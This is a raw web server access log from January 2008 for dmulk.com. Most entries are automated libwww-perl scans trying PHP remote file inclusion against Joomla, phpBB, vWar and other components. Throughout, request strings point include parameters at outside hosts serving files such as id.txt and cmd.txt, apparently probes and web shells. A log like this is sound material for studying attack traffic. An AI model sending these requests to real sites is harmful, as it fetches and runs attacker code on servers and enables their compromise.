201.130.79.129 - - [15/Jan/2008:09:46:47 -0800] "GET /logs/access_071229.log/modules/vwar/admin/admin.php?vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.129 - - [15/Jan/2008:09:46:47 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.129 - - [15/Jan/2008:09:46:48 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.140.234.80 - - [15/Jan/2008:09:47:19 -0800] "GET /logs/access_071224.log/sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.143.232 - - [15/Jan/2008:09:47:19 -0800] "GET /logs/access_071229.log//mambots/content/amazonpartner.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.143.232 - - [15/Jan/2008:09:47:19 -0800] "GET //mambots/content/amazonpartner.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.143.232 - - [15/Jan/2008:09:47:20 -0800] "GET /logs//mambots/content/amazonpartner.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.130.79.129 - - [15/Jan/2008:09:47:29 -0800] "GET /logs/access_071229.log/vwar/admin/admin.php?vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.129 - - [15/Jan/2008:09:47:29 -0800] "GET /vwar/admin/admin.php?vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.129 - - [15/Jan/2008:09:47:29 -0800] "GET /logs/vwar/admin/admin.php?vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.9 - - [15/Jan/2008:09:49:42 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.9 - - [15/Jan/2008:09:49:42 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.9 - - [15/Jan/2008:09:49:42 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:09:50:10 -0800] "GET //index.php?p=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:09:50:18 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:09:50:18 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:09:50:19 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [15/Jan/2008:09:50:35 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [15/Jan/2008:09:50:35 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [15/Jan/2008:09:51:07 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [15/Jan/2008:09:51:07 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:09:53:19 -0800] "GET /logs/access_071229.log//index.php?menu=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:09:53:20 -0800] "GET /logs//index.php?menu=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.12 - - [15/Jan/2008:09:54:04 -0800] "GET /logs/access_071225.log/index.php?body=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [15/Jan/2008:09:54:05 -0800] "GET /index.php?body=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [15/Jan/2008:09:54:05 -0800] "GET /logs/index.php?body=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.184.199 - - [15/Jan/2008:09:55:05 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.184.199 - - [15/Jan/2008:09:55:06 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.184.199 - - [15/Jan/2008:09:55:07 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.106.134.31 - - [15/Jan/2008:09:58:07 -0800] "GET /logs/access_071216.log HTTP/1.1" 200 200644 "http://search.yahoo.com/search?p=%2Fmodules%2Ftinycontent%2Fadmin%2Fspaw%2Fspaw_control.class.php%3Fspaw_root%3D" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.2)" "www.dmulk.com"
213.203.184.199 - - [15/Jan/2008:09:58:51 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.184.199 - - [15/Jan/2008:09:58:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.184.199 - - [15/Jan/2008:09:58:52 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.216.11 - - [15/Jan/2008:09:59:35 -0800] "GET /?mosConfig_absolute_path=http://www.huerzeler-reisen.ch/cache/stats.txt?? HTTP/1.0" 200 2946 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [15/Jan/2008:09:59:54 -0800] "GET /?mosConfig_absolute_path=http://www.huerzeler-reisen.ch/cache/stats.txt?? HTTP/1.0" 200 2946 "-" "libwww-perl/5.53" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:10:01:41 -0800] "GET /logs/access_071229.log//index.php?p=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:10:01:41 -0800] "GET /logs//index.php?p=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:01:49 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:01:49 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:01:50 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.24.104 - - [15/Jan/2008:10:02:03 -0800] "GET /plans/?N=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.73.9 - - [15/Jan/2008:10:02:05 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:02:16 -0800] "GET /logs/access_071229.log/?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:02:17 -0800] "GET /?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:02:18 -0800] "GET /logs/?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 30253 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:02:55 -0800] "GET /logs/access_071229.log/////////?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:02:55 -0800] "GET /////////?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 2969 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:02:56 -0800] "GET /logs/////////?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 30265 "-" "libwww-perl/5.65" "www.dmulk.com"
195.242.208.120 - - [15/Jan/2008:10:03:36 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.212.210 - - [15/Jan/2008:10:05:36 -0800] "GET / HTTP/1.1" 200 2962 "http://o-db.com/en/dictionary/russian_english/bataliya.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)" "dmulk.com"
66.225.219.10 - - [15/Jan/2008:10:06:57 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [15/Jan/2008:10:06:57 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [15/Jan/2008:10:06:57 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.66.208.56 - - [15/Jan/2008:10:07:21 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.208.56 - - [15/Jan/2008:10:07:22 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.162.134.137 - - [15/Jan/2008:10:07:59 -0800] "GET /logs/access_071228.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.137 - - [15/Jan/2008:10:07:59 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.137 - - [15/Jan/2008:10:07:59 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.58.70 - - [15/Jan/2008:10:08:28 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.arcantus.we.bs/cmdasc.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.58.70 - - [15/Jan/2008:10:08:28 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.arcantus.we.bs/cmdasc.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.58.70 - - [15/Jan/2008:10:08:29 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.arcantus.we.bs/cmdasc.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [15/Jan/2008:10:11:09 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [15/Jan/2008:10:11:09 -0800] "GET /bikes/?D=D HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.55.216.70 - - [15/Jan/2008:10:11:18 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.214.54 - - [15/Jan/2008:10:11:36 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.214.54 - - [15/Jan/2008:10:11:38 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.87.131.98 - - [15/Jan/2008:10:12:41 -0800] "GET /logs/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
80.87.131.98 - - [15/Jan/2008:10:12:41 -0800] "GET /index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
200.55.216.70 - - [15/Jan/2008:10:14:04 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.198.72 - - [15/Jan/2008:10:14:25 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [15/Jan/2008:10:14:26 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.239.121.190 - - [15/Jan/2008:10:14:59 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rodrigosigal.com/visionessonoras2006/usr/downloads/common/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [15/Jan/2008:10:15:00 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rodrigosigal.com/visionessonoras2006/usr/downloads/common/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [15/Jan/2008:10:15:00 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rodrigosigal.com/visionessonoras2006/usr/downloads/common/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:10:15:42 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:10:15:42 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:16:25 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:16:25 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:16:26 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.10.138.63 - - [15/Jan/2008:10:16:53 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [15/Jan/2008:10:16:53 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [15/Jan/2008:10:16:53 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:17:00 -0800] "GET /logs/access_071229.log/////////?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:17:01 -0800] "GET /////////?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 2969 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:10:17:02 -0800] "GET /logs/////////?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 30265 "-" "libwww-perl/5.65" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:10:19:56 -0800] "GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:10:19:56 -0800] "GET /logs/includes/search.php?GlobalSettings[templatesDirectory]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:10:20:04 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [15/Jan/2008:10:20:39 -0800] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [15/Jan/2008:10:20:39 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [15/Jan/2008:10:20:40 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.245.164 - - [15/Jan/2008:10:20:43 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.16.161.65 - - [15/Jan/2008:10:20:54 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://valhalla360.com/images/help.jpg/crit??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
89.16.161.65 - - [15/Jan/2008:10:20:54 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://valhalla360.com/images/help.jpg/crit??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
62.75.245.164 - - [15/Jan/2008:10:21:27 -0800] "GET /////////?CONFIG_EXT[LANGUAGES_DIR]=http://mobee.ru/usr/xml/c?? HTTP/1.1" 200 2969 "-" "libwww-perl/5.69" "www.dmulk.com"
64.22.125.219 - - [15/Jan/2008:10:23:05 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [15/Jan/2008:10:23:40 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [15/Jan/2008:10:24:41 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [15/Jan/2008:10:24:45 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [15/Jan/2008:10:25:47 -0800] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:10:26:36 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:10:26:37 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.200.116.198 - - [15/Jan/2008:10:26:42 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1)" "dmulk.com"
85.10.138.63 - - [15/Jan/2008:10:26:45 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [15/Jan/2008:10:26:46 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [15/Jan/2008:10:26:46 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.200.116.9 - - [15/Jan/2008:10:26:51 -0800] "GET /minamijewelry/ HTTP/1.1" 403 163 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1)" "dmulk.com"
207.200.116.198 - - [15/Jan/2008:10:26:54 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1)" "dmulk.com"
69.2.228.90 - - [15/Jan/2008:10:28:11 -0800] "GET /logs/access_071225.log/index.php?body=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.2.228.90 - - [15/Jan/2008:10:28:12 -0800] "GET /index.php?body=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.2.228.90 - - [15/Jan/2008:10:28:12 -0800] "GET /logs/index.php?body=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
195.242.208.120 - - [15/Jan/2008:10:28:48 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.66.208.56 - - [15/Jan/2008:10:30:41 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
